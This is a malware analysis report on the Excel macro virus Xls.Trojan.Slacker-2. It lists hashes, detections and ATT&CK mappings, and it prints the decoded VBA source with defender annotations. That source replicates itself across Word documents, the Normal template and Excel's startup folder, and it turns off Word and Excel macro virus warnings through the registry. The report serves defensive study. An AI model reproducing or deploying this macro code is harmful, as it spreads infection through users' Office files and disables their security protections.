Xls.Trojan.Slacker-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 b3986e912d0f7664…

MALICIOUS

Office (OLE)

24.0 KB Created: 2001-09-21 07:15:11 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: bfb9c6859eeb49319a50f6ed60c7dc47 SHA-1: 67186a89533eb4833994857d41bd6a02d93f18fd SHA-256: b3986e912d0f7664fbdae4d48d44a83d700a91cffb19bd042500acd4f0c6710a
220 Risk Score

Malware Insights

Xls.Trojan.Slacker-2 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

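The file is identified as malicious by ClamAV with the signature Xls.Trojan.Slacker-2, and the extracted macro artifact is also detected as Doc.Trojan.Hopper-10. The VBA macros contain CreateObject and GetObject calls, indicating an attempt to execute code. The macro code appears to be designed to copy itself to other templates and potentially download or execute additional payloads, as suggested by the use of 'GetObject' and 'CreateObject' for 'Excel.Application'. In the portion of the macro shown in the preview below, these calls drive Word and Excel through automation so the code can copy itself between documents, the Normal template and a workbook saved to Excel's startup path; the same code also turns off Word's macro virus protection option and writes Options6 registry values. No download logic is visible in that portion, and the preview is truncated.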

Heuristics 4

  • ClamAV: Xls.Trojan.Slacker-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Slacker-2
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4806 bytes
SHA-256: c8fbda9c89fbd7d6324194367bf8a1ca1cb577782b4987b626f9e205cec4d9f5
Detection
ClamAV: Doc.Trojan.Hopper-10
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'<!--BEAT-->
'2000-4
Private Sub Document_Close()
    ' Analyst note: Word document-close handler of the sample.
    ' It copies this module's code between the active document, the Normal
    ' template and Templates(1), then writes a copy into a new workbook saved
    ' under Excel's startup path. The first code line "'<!--BEAT-->" serves as
    ' the "already carries the code" marker for every target.
    ' Defender view: the Normal-template write corresponds to ATT&CK T1137.001
    ' (Office Template Macros); all of it needs programmatic access to the VBA
    ' project object model.
    ' Errors are suppressed, so any step that fails is skipped without a prompt.
    On Error Resume Next
    ' Helper defined later in this module: turns off Word's VirusProtection
    ' option and writes the Excel Options6 registry values before replicating.
    OfficeVirusProtection
''  DoWordtoItself
    ' Code modules of the first VB component in: the Normal template (nt),
    ' the first loaded template (TT) and the document being closed (ad).
    Set nt = NormalTemplate.VBProject.VBComponents(1).CodeModule
    Set TT = Templates(1).VBProject.VBComponents(1).CodeModule
    Set ad = ActiveDocument.VBProject.VBComponents(1).CodeModule
    ' Document lacks the marker: its existing code is deleted and replaced with
    ' the template's code; if the marker is still missing, Normal's code is used.
    If ad.Lines(1, 1) <> "'<!--BEAT-->" Then
        ad.DeleteLines 1, ad.CountofLines
        ad.InsertLines 1, TT.Lines(1, TT.CountofLines)
        If ad.Lines(1, 1) <> "'<!--BEAT-->" Then
            ad.InsertLines 1, nt.Lines(1, nt.CountofLines)
        End If
    End If
    ' Normal template lacks the marker: overwritten with the document's code.
    If nt.Lines(1, 1) <> "'<!--BEAT-->" Then
        nt.DeleteLines 1, nt.CountofLines
        nt.InsertLines 1, ad.Lines(1, ad.CountofLines)
     End If
        '-------------------
    ' Templates(1) lacks the marker: overwritten with Normal's code.
    If TT.Lines(1, 1) <> "'<!--BEAT-->" Then
        TT.DeleteLines 1, TT.CountofLines
        TT.InsertLines 1, nt.Lines(1, nt.CountofLines)
    End If
''    DoWordtoExcel
    ' Attach to a running Excel instance, otherwise start one via automation.
    ' NOTE(review): the = "" test presumably holds only when GetObject failed
    ' and xlApp was never assigned - confirm against VBA coercion rules.
    Set xlApp = GetObject(, "Excel.Application")
     If xlApp = "" Then
    Set xlApp = CreateObject("Excel.Application")
        WQuit = True
    End If
    '-----------
    ' An existing extensionless "Book1." in Excel's startup path is deleted first.
    If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) = UCase("BOOK1") Then ''convert to an upper-case string (author comment, translated from Chinese)
            Kill xlApp.Application.StartupPath + "\Book1."
    End If
    '------------
    ' A new workbook receives Normal's code in its ThisWorkbook module and is
    ' saved as "Book1." in the startup path, the folder Excel opens workbooks
    ' from at launch. Defender view: an extensionless Book1 file in that folder
    ' is a host indicator for this sample.
    Set Book1Obj = xlApp.Workbooks.Add
        Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, nt.Lines(1, nt.CountofLines)
        Book1Obj.SaveAs xlApp.Application.StartupPath & "\Book1."
        Book1Obj.Close
        ' Quit is called without checking WQuit, so an Excel instance that was
        ' already running is closed as well.
        xlApp.Quit
'   ------------------
End Sub

Private Sub Workbook_Deactivate()
    ' Analyst note: Excel workbook-deactivate handler of the sample.
    ' It copies the ThisWorkbook code between the active workbook and the
    ' workbook hosting this code, then writes it into Word's Normal template.
    ' "'<!--BEAT-->" on the first code line is the "already carries the code"
    ' marker. Errors are suppressed, so failing steps are skipped silently.
    On Error Resume Next
    ' Helper defined later in this module: turns off Word's VirusProtection
    ' option and writes the Excel Options6 registry values.
    OfficeVirusProtection
    ' AW = ThisWorkbook module of the active workbook, TW = ThisWorkbook module
    ' of the workbook this code runs from.
    Set AW = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
    Set TW = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
        ' Active workbook lacks the marker: its code is deleted and replaced.
        If AW.Lines(1, 1) <> "'<!--BEAT-->" Then
        AW.DeleteLines 1, AW.CountofLines
        AW.InsertLines 1, TW.Lines(1, TW.CountofLines)
    End If
        ' Hosting workbook lacks the marker: its code is deleted and replaced.
        ' NOTE(review): the line count passed to AW.Lines is TW's, read after
        ' the DeleteLines call on the previous line.
        If TW.Lines(1, 1) <> "'<!--BEAT-->" Then
        TW.DeleteLines 1, TW.CountofLines
        TW.InsertLines 1, AW.Lines(1, TW.CountofLines)
    End If
    '--------------
    ' Attach to a running Word instance, otherwise start one via automation;
    ' WQuit records that this code started it.
    ' NOTE(review): the = "" test presumably holds only when GetObject failed
    ' and WordObj was never assigned - confirm against VBA coercion rules.
    Set WordObj = GetObject(, "Word.Application")
     If WordObj = "" Then
    Set WordObj = CreateObject("Word.Application")
        WQuit = True
    End If
    ' Word's Normal template lacks the marker: its first component's code is
    ' overwritten with this workbook's code. Defender view: corresponds to
    ' ATT&CK T1137.001 (Office Template Macros); a modified Normal template
    ' after opening a workbook is a host indicator.
    Set nt = WordObj.NormalTemplate.VBProject.VBComponents(1).CodeModule
     If nt.Lines(1, 1) <> "'<!--BEAT-->" Then
        nt.DeleteLines 1, nt.CountofLines
        nt.InsertLines 1, TW.Lines(1, TW.CountofLines)
     End If
    Set nt = Nothing
    ' Word is closed only when this code started the instance.
    If WQuit = True Then WordObj.Quit
End Sub

Private Sub OfficeVirusProtection()
    ' Analyst note: defence-impairment helper called first by both event
    ' handlers in this module. It switches off Word options that would warn the
    ' user and writes "0" to Excel "Options6" registry values.
    ' Defender view: corresponds to ATT&CK T1562.001 (Impair Defenses: Disable
    ' or Modify Tools); writes to the Options6 values named below are a host
    ' indicator. Errors are suppressed, so failing steps are skipped silently.
    On Error Resume Next
'''word'VirusProtection
    ' Attach to a running Word instance, otherwise start one via automation.
    ' WQuit is set but no Quit call follows in this Sub, so an instance started
    ' here is not closed by this routine.
    Set WordObj = GetObject(, "Word.Application")
    If WordObj = "" Then
    Set WordObj = CreateObject("Word.Application")
    WQuit = True
    End If
    Set WdappOp = WordObj.Options
    ' VirusProtection = False turns off Word's macro virus warning;
    ' ConfirmConversions and SaveNormalPrompt = False suppress the conversion
    ' dialog and the prompt shown before changes to the Normal template are saved.
    With WdappOp
        .VirusProtection = False
        .ConfirmConversions = False
        .SaveNormalPrompt = False
    End With
    '''excel'VirusProtection
    ' With an empty file name, PrivateProfileString addresses the registry:
    ' Options6 is set to "0" under the Office 8.0 Excel key for the current
    ' user, the new-user defaults and the .Default profile.
    ' NOTE(review): Options6 is presumably the Excel macro virus warning
    ' setting, going by the author's section label - confirm.
    ' NOTE(review): System is referenced unqualified, so these lines presumably
    ' resolve only when the code runs inside Word - confirm.
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "0" ' = "Check"
    System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = "0" '= ""
    System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "0" ' = "Whoa"
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribut
... (truncated)